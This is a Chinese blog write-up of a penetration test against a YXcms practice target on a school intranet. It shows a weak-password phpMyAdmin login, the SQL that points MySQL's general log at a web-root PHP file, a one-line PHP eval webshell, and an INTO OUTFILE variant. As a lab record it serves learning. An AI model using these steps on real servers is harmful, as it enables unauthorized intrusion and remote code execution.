前些天大哥们在学校内网搭了这个YXcms靶场,记录一下这次测试过程的一些方法感受,分享一下。
首先信息收集一波,不管拿到什么站点,第一件要做的事就是信息收集,收集越多的信息,那拿下这个站点的成功率也就越高,但这里因为是内网搭建的 所以这里就不进行whois,子域名探查了,
用御剑进行目录扫描:

发现有phpinfo页面,那就能知道配置信息了,还有phpMyAdmin,进去看看

尝试弱密码登陆,成功进入管理页面

百度一下,phpMyAdmin怎么拿shell,点击变量开启日志文件,然后设置日志文件的存储路径

点击sql,创建日志文件,并定义它的路径
SET GLOBAL general_log_file=‘C:/phpStudy/www/Lin.php’
查看日志功能是否开启
show variables like ‘%general%’;

确定日志文件开启,路径也确定了。那就可以开搞了,写入一句话
select ‘<?php eval($_POST[Lin]);?>’

(这里如果没有禁用outfile的话ye是可以直接
select ‘<?php eval($_POST[lin]);?>’ into outfile ‘/var/www/Lin.php’
但这里禁用了 那就没办法了)

上菜刀,拿到shell

YXcms之利用phpMyAdmin拿shell相关推荐

  1. SQL语句利用日志写shell

    outfile被禁止,或者写入文件被拦截: 在数据库中操作如下:(必须是root权限) show variables like '%general%'; #查看配置 set global genera ...

  2. shell实例第18讲:利用gzexe加密shell脚本

    利用gzexe加密shell脚本 gzexe_test.sh内容如下: #!/bin/bashecho "gzexe test!" 结果: 使用gzexe加密shell脚本命令:g ...

  3. 利用NCL和Shell制作动图

    利用NCL和Shell制作动图 两个步骤: 1. NCL画图 必须保存成PDF格式,且frame设置为翻页: begincam_file1 = addfile("./run/FHIST_LK ...

  4. 如何利用matrox mil在picturebox中显示image_利用自拍照反弹shell

    文章来源:洛米唯熊 0x00:前言 继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观.确实,新颖的利用方式.很有利用价值!闲话少说.今天,利用奇思妙想的方法来反弹shell.用 ...

  5. linux利用位置参数数组,Shell编程1_变量、参数和数组

    目录 一.从变量开始 1.环境变量 export命令 2.系统自带的环境变量 3.变量的定义和赋值 二.使用参数 参数的获取 三.数组的基本使用 1.数组的定义 2.数组的删除 3.数组的切片和替换 ...

  6. 利用WebShell拿Shell技巧

    webshell就是以asp.php.jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网 ...

  7. windows ssh传文件linux,利用SSH secure Shell实现windows与linux之间传输文件

    在windows下安装SSH secure Shell.默认安装后有两个快捷方式. linux下需要安装openssh-server utuntu默认安装了opens是-client,所以不需要安装, ...

  8. python3 利用eval反弹shell

    在最近的python开发中 用到了 字符串转字典 使用了eval 这让我想起了php中的eval 搜索一下果然问题严重 既然有问题 那就来试试反弹shell吧 看看效果 搜索一下 找到了 python ...

  9. mysql 启动个关闭命定_mysql利用phpmyadmin实现数据库同步更新

    以前我们设置数据同步更新需要两台mysql数据库实现主从配置了,下面我来介绍高版本的phpmyadmin就可以快速实现这个功能了,下面我以图文给大家介绍. 台作为从服务器来实现的.在这里我把我做的过程 ...

最新文章

  1. 无头结点单链表的逆置_单链表的增删查 逆置 倒数第k个节点等问题
  2. [转] Apache日志分析常用Shell命令
  3. 关于商品分类 商品表和属性表的设计
  4. Ubuntu系统全盘备份与恢复,亲自总结,实测可靠
  5. oracle sql 匹配 一位,关于在SQL中查找匹配间隔:在SQL中查找匹配间隔-Oracle
  6. CentOS下编译64位的libpython2.6.so.1.0库
  7. java 货币格式 转换_java 货币 转换
  8. MySQL为啥不用平衡二叉树_MySQL的索引,为什么是B+而不是平衡二叉树
  9. android事件拦截处理机制详解
  10. Extjs MVC讲解
  11. #牛客网 2018年牛客多校算法寒假训练营练习比赛(第五场)
  12. 苏宁“北京攻略”:老阵地,新战场 | 一点财经
  13. 虚拟机挂起后硬盘响应变慢,SCSI转IDE方法
  14. 数据结构考研:大O表示法最浅显易懂且详细深入的解释及与小o表示法的区别(十分钟必懂)
  15. Anaconda创建虚拟环境时报错 InvalidArchiveError Error with archive D:\\(anaconda的路径)\\pkgs\\vs2015_runtime
  16. 霸气!女学霸考692分想当“程序媛”,女王式发言:也没见男生考得比我好
  17. java多线程详解及线程池创建
  18. 用户标签体系的搭建方法
  19. 深夜,我常逛的几个网站。
  20. 【洛谷 P5550】 Chino的数列【矩阵乘法】

热门文章

  1. dell pcserver修改idrac密码
  2. 图片处理——基于openCV实现美颜相机
  3. 2022年蓝旭前端第三次暑期培训课(上)
  4. Pikachu靶场-SQL Inject
  5. 【Spring】Spring Framework Reference Documentation中文版18
  6. 或是独体字吗_独体字归纳
  7. 2022年中国苹果产业发展现状及发展趋势分析:苹果种植面积约为3132.12万亩,其中黄土高原优势区占58.44%[图]
  8. 中国蔬菜摊行业市场供需与战略研究报告
  9. BPTT(BackPropagation Through Time)
  10. [译] Swift 中的动态特性